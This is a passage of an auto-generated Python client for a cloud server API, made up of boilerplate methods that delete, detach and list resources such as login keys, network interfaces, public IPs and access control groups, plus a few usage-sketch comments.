query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_login_keys_request' in params:
body_params = params['delete_login_keys_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteLoginKeys', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteLoginKeysResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def delete_member_server_image_instances(self, delete_member_server_image_instances_request, **kwargs): # noqa: E501
        """delete_member_server_image_instances # noqa: E501

        Delete member server image instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_member_server_image_instances(delete_member_server_image_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteMemberServerImageInstancesRequest delete_member_server_image_instances_request: deleteMemberServerImageInstancesRequest (required)
:return: DeleteMemberServerImageInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_member_server_image_instances_with_http_info(delete_member_server_image_instances_request, **kwargs) # noqa: E501
else:
(data) = self.delete_member_server_image_instances_with_http_info(delete_member_server_image_instances_request, **kwargs) # noqa: E501
return data

    def delete_member_server_image_instances_with_http_info(self, delete_member_server_image_instances_request, **kwargs): # noqa: E501
        """delete_member_server_image_instances # noqa: E501

        Delete member server image instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_member_server_image_instances_with_http_info(delete_member_server_image_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteMemberServerImageInstancesRequest delete_member_server_image_instances_request: deleteMemberServerImageInstancesRequest (required)
:return: DeleteMemberServerImageInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_member_server_image_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_member_server_image_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_member_server_image_instances_request' is set
if ('delete_member_server_image_instances_request' not in params or
params['delete_member_server_image_instances_request'] is None):
raise ValueError("Missing the required parameter `delete_member_server_image_instances_request` when calling `delete_member_server_image_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_member_server_image_instances_request' in params:
body_params = params['delete_member_server_image_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteMemberServerImageInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteMemberServerImageInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def delete_network_interface(self, delete_network_interface_request, **kwargs): # noqa: E501
        """delete_network_interface # noqa: E501

        Delete a network interface # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_network_interface(delete_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteNetworkInterfaceRequest delete_network_interface_request: deleteNetworkInterfaceRequest (required)
:return: DeleteNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_network_interface_with_http_info(delete_network_interface_request, **kwargs) # noqa: E501
else:
(data) = self.delete_network_interface_with_http_info(delete_network_interface_request, **kwargs) # noqa: E501
return data

    def delete_network_interface_with_http_info(self, delete_network_interface_request, **kwargs): # noqa: E501
        """delete_network_interface # noqa: E501

        Delete a network interface # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_network_interface_with_http_info(delete_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteNetworkInterfaceRequest delete_network_interface_request: deleteNetworkInterfaceRequest (required)
:return: DeleteNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_network_interface_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_network_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_network_interface_request' is set
if ('delete_network_interface_request' not in params or
params['delete_network_interface_request'] is None):
raise ValueError("Missing the required parameter `delete_network_interface_request` when calling `delete_network_interface`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_network_interface_request' in params:
body_params = params['delete_network_interface_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteNetworkInterface', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteNetworkInterfaceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def delete_placement_group(self, delete_placement_group_request, **kwargs): # noqa: E501
        """delete_placement_group # noqa: E501

        Delete a physical placement group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_placement_group(delete_placement_group_request, async=True)
>>> result = thread.get()
:param async bool
:param DeletePlacementGroupRequest delete_placement_group_request: deletePlacementGroupRequest (required)
:return: DeletePlacementGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_placement_group_with_http_info(delete_placement_group_request, **kwargs) # noqa: E501
else:
(data) = self.delete_placement_group_with_http_info(delete_placement_group_request, **kwargs) # noqa: E501
return data

    def delete_placement_group_with_http_info(self, delete_placement_group_request, **kwargs): # noqa: E501
        """delete_placement_group # noqa: E501

        Delete a physical placement group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_placement_group_with_http_info(delete_placement_group_request, async=True)
>>> result = thread.get()
:param async bool
:param DeletePlacementGroupRequest delete_placement_group_request: deletePlacementGroupRequest (required)
:return: DeletePlacementGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_placement_group_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_placement_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_placement_group_request' is set
if ('delete_placement_group_request' not in params or
params['delete_placement_group_request'] is None):
raise ValueError("Missing the required parameter `delete_placement_group_request` when calling `delete_placement_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_placement_group_request' in params:
body_params = params['delete_placement_group_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deletePlacementGroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeletePlacementGroupResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def delete_public_ip_instance(self, delete_public_ip_instance_request, **kwargs): # noqa: E501
        """delete_public_ip_instance # noqa: E501

        Delete a public IP instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_public_ip_instance(delete_public_ip_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param DeletePublicIpInstanceRequest delete_public_ip_instance_request: deletePublicIpInstanceRequest (required)
:return: DeletePublicIpInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_public_ip_instance_with_http_info(delete_public_ip_instance_request, **kwargs) # noqa: E501
else:
(data) = self.delete_public_ip_instance_with_http_info(delete_public_ip_instance_request, **kwargs) # noqa: E501
return data

    def delete_public_ip_instance_with_http_info(self, delete_public_ip_instance_request, **kwargs): # noqa: E501
        """delete_public_ip_instance # noqa: E501

        Delete a public IP instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_public_ip_instance_with_http_info(delete_public_ip_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param DeletePublicIpInstanceRequest delete_public_ip_instance_request: deletePublicIpInstanceRequest (required)
:return: DeletePublicIpInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_public_ip_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_public_ip_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_public_ip_instance_request' is set
if ('delete_public_ip_instance_request' not in params or
params['delete_public_ip_instance_request'] is None):
raise ValueError("Missing the required parameter `delete_public_ip_instance_request` when calling `delete_public_ip_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_public_ip_instance_request' in params:
body_params = params['delete_public_ip_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deletePublicIpInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeletePublicIpInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
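
    # Usage sketch (illustrative): per-call transport options. The keyword
    # names come straight from `all_params` above; the timeout semantics
    # (a total-seconds float or a (connect, read) pair) follow urllib3
    # conventions and are an assumption here.
    #
    #   response = api.delete_public_ip_instance(
    #       request,
    #       _request_timeout=(5, 30),  # connect/read timeouts in seconds
    #       _preload_content=True)     # deserialize into the response model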

    def detach_block_storage_instances(self, detach_block_storage_instances_request, **kwargs): # noqa: E501
        """detach_block_storage_instances # noqa: E501

        Detach block storage instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.detach_block_storage_instances(detach_block_storage_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DetachBlockStorageInstancesRequest detach_block_storage_instances_request: detachBlockStorageInstancesRequest (required)
:return: DetachBlockStorageInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.detach_block_storage_instances_with_http_info(detach_block_storage_instances_request, **kwargs) # noqa: E501
else:
(data) = self.detach_block_storage_instances_with_http_info(detach_block_storage_instances_request, **kwargs) # noqa: E501
return data

    def detach_block_storage_instances_with_http_info(self, detach_block_storage_instances_request, **kwargs): # noqa: E501
        """detach_block_storage_instances # noqa: E501

        Detach block storage instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.detach_block_storage_instances_with_http_info(detach_block_storage_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DetachBlockStorageInstancesRequest detach_block_storage_instances_request: detachBlockStorageInstancesRequest (required)
:return: DetachBlockStorageInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['detach_block_storage_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method detach_block_storage_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'detach_block_storage_instances_request' is set
if ('detach_block_storage_instances_request' not in params or
params['detach_block_storage_instances_request'] is None):
raise ValueError("Missing the required parameter `detach_block_storage_instances_request` when calling `detach_block_storage_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'detach_block_storage_instances_request' in params:
body_params = params['detach_block_storage_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/detachBlockStorageInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DetachBlockStorageInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def detach_network_interface(self, detach_network_interface_request, **kwargs): # noqa: E501
        """detach_network_interface # noqa: E501

        Detach a network interface # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.detach_network_interface(detach_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param DetachNetworkInterfaceRequest detach_network_interface_request: detachNetworkInterfaceRequest (required)
:return: DetachNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.detach_network_interface_with_http_info(detach_network_interface_request, **kwargs) # noqa: E501
else:
(data) = self.detach_network_interface_with_http_info(detach_network_interface_request, **kwargs) # noqa: E501
return data

    def detach_network_interface_with_http_info(self, detach_network_interface_request, **kwargs): # noqa: E501
        """detach_network_interface # noqa: E501

        Detach a network interface # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.detach_network_interface_with_http_info(detach_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param DetachNetworkInterfaceRequest detach_network_interface_request: detachNetworkInterfaceRequest (required)
:return: DetachNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['detach_network_interface_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method detach_network_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'detach_network_interface_request' is set
if ('detach_network_interface_request' not in params or
params['detach_network_interface_request'] is None):
raise ValueError("Missing the required parameter `detach_network_interface_request` when calling `detach_network_interface`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'detach_network_interface_request' in params:
body_params = params['detach_network_interface_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/detachNetworkInterface', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DetachNetworkInterfaceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def disassociate_public_ip_from_server_instance(self, disassociate_public_ip_from_server_instance_request, **kwargs): # noqa: E501
        """disassociate_public_ip_from_server_instance # noqa: E501

        Disassociate a public IP from a server instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.disassociate_public_ip_from_server_instance(disassociate_public_ip_from_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param DisassociatePublicIpFromServerInstanceRequest disassociate_public_ip_from_server_instance_request: disassociatePublicIpFromServerInstanceRequest (required)
:return: DisassociatePublicIpFromServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.disassociate_public_ip_from_server_instance_with_http_info(disassociate_public_ip_from_server_instance_request, **kwargs) # noqa: E501
else:
(data) = self.disassociate_public_ip_from_server_instance_with_http_info(disassociate_public_ip_from_server_instance_request, **kwargs) # noqa: E501
return data

    def disassociate_public_ip_from_server_instance_with_http_info(self, disassociate_public_ip_from_server_instance_request, **kwargs): # noqa: E501
        """disassociate_public_ip_from_server_instance # noqa: E501

        Disassociate a public IP from a server instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.disassociate_public_ip_from_server_instance_with_http_info(disassociate_public_ip_from_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param DisassociatePublicIpFromServerInstanceRequest disassociate_public_ip_from_server_instance_request: disassociatePublicIpFromServerInstanceRequest (required)
:return: DisassociatePublicIpFromServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['disassociate_public_ip_from_server_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method disassociate_public_ip_from_server_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'disassociate_public_ip_from_server_instance_request' is set
if ('disassociate_public_ip_from_server_instance_request' not in params or
params['disassociate_public_ip_from_server_instance_request'] is None):
raise ValueError("Missing the required parameter `disassociate_public_ip_from_server_instance_request` when calling `disassociate_public_ip_from_server_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'disassociate_public_ip_from_server_instance_request' in params:
body_params = params['disassociate_public_ip_from_server_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/disassociatePublicIpFromServerInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DisassociatePublicIpFromServerInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
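
    # Usage sketch (illustrative): every endpoint validates its single
    # required request object before dispatching, so passing None fails
    # fast with a ValueError instead of producing a malformed HTTP call.
    #
    #   try:
    #       api.disassociate_public_ip_from_server_instance(None)
    #   except ValueError as e:
    #       print(e)  # "Missing the required parameter ..."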

    def get_access_control_group_detail(self, get_access_control_group_detail_request, **kwargs): # noqa: E501
        """get_access_control_group_detail # noqa: E501

        Get ACG detail # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_access_control_group_detail(get_access_control_group_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetAccessControlGroupDetailRequest get_access_control_group_detail_request: getAccessControlGroupDetailRequest (required)
:return: GetAccessControlGroupDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_access_control_group_detail_with_http_info(get_access_control_group_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_access_control_group_detail_with_http_info(get_access_control_group_detail_request, **kwargs) # noqa: E501
return data

    def get_access_control_group_detail_with_http_info(self, get_access_control_group_detail_request, **kwargs): # noqa: E501
        """get_access_control_group_detail # noqa: E501

        Get ACG detail # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_access_control_group_detail_with_http_info(get_access_control_group_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetAccessControlGroupDetailRequest get_access_control_group_detail_request: getAccessControlGroupDetailRequest (required)
:return: GetAccessControlGroupDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_access_control_group_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_access_control_group_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_access_control_group_detail_request' is set
if ('get_access_control_group_detail_request' not in params or
params['get_access_control_group_detail_request'] is None):
raise ValueError("Missing the required parameter `get_access_control_group_detail_request` when calling `get_access_control_group_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_access_control_group_detail_request' in params:
body_params = params['get_access_control_group_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getAccessControlGroupDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetAccessControlGroupDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def get_access_control_group_list(self, get_access_control_group_list_request, **kwargs): # noqa: E501
        """get_access_control_group_list # noqa: E501

        Get ACG list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_access_control_group_list(get_access_control_group_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetAccessControlGroupListRequest get_access_control_group_list_request: getAccessControlGroupListRequest (required)
:return: GetAccessControlGroupListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_access_control_group_list_with_http_info(get_access_control_group_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_access_control_group_list_with_http_info(get_access_control_group_list_request, **kwargs) # noqa: E501
return data

    def get_access_control_group_list_with_http_info(self, get_access_control_group_list_request, **kwargs): # noqa: E501
        """get_access_control_group_list # noqa: E501

        Get ACG list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_access_control_group_list_with_http_info(get_access_control_group_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetAccessControlGroupListRequest get_access_control_group_list_request: getAccessControlGroupListRequest (required)
:return: GetAccessControlGroupListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_access_control_group_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_access_control_group_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_access_control_group_list_request' is set
if ('get_access_control_group_list_request' not in params or
params['get_access_control_group_list_request'] is None):
raise ValueError("Missing the required parameter `get_access_control_group_list_request` when calling `get_access_control_group_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_access_control_group_list_request' in params:
body_params = params['get_access_control_group_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getAccessControlGroupList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetAccessControlGroupListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def get_access_control_group_rule_list(self, get_access_control_group_rule_list_request, **kwargs): # noqa: E501
        """get_access_control_group_rule_list # noqa: E501

        Get ACG rule list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_access_control_group_rule_list(get_access_control_group_rule_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetAccessControlGroupRuleListRequest get_access_control_group_rule_list_request: getAccessControlGroupRuleListRequest (required)
:return: GetAccessControlGroupRuleListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_access_control_group_rule_list_with_http_info(get_access_control_group_rule_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_access_control_group_rule_list_with_http_info(get_access_control_group_rule_list_request, **kwargs) # noqa: E501
return data

    def get_access_control_group_rule_list_with_http_info(self, get_access_control_group_rule_list_request, **kwargs): # noqa: E501
        """get_access_control_group_rule_list # noqa: E501

        Get ACG rule list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_access_control_group_rule_list_with_http_info(get_access_control_group_rule_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetAccessControlGroupRuleListRequest get_access_control_group_rule_list_request: getAccessControlGroupRuleListRequest (required)
:return: GetAccessControlGroupRuleListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_access_control_group_rule_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_access_control_group_rule_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_access_control_group_rule_list_request' is set
if ('get_access_control_group_rule_list_request' not in params or
params['get_access_control_group_rule_list_request'] is None):
raise ValueError("Missing the required parameter `get_access_control_group_rule_list_request` when calling `get_access_control_group_rule_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_access_control_group_rule_list_request' in params:
body_params = params['get_access_control_group_rule_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getAccessControlGroupRuleList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetAccessControlGroupRuleListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
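
    # Usage sketch (illustrative): the three ACG lookups compose naturally:
    # list the groups, then fetch detail or rules per group. The request
    # constructors and the `access_control_group_no` field are assumptions
    # about the generated model classes, not confirmed by this module.
    #
    #   groups = api.get_access_control_group_list(
    #       ncloud_server.GetAccessControlGroupListRequest())
    #   for acg in groups.access_control_group_list:
    #       rules = api.get_access_control_group_rule_list(
    #           ncloud_server.GetAccessControlGroupRuleListRequest(
    #               access_control_group_no=acg.access_control_group_no))
    #       print(rules)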

    def get_block_storage_instance_detail(self, get_block_storage_instance_detail_request, **kwargs): # noqa: E501
        """get_block_storage_instance_detail # noqa: E501

        Get block storage instance detail # noqa: E501
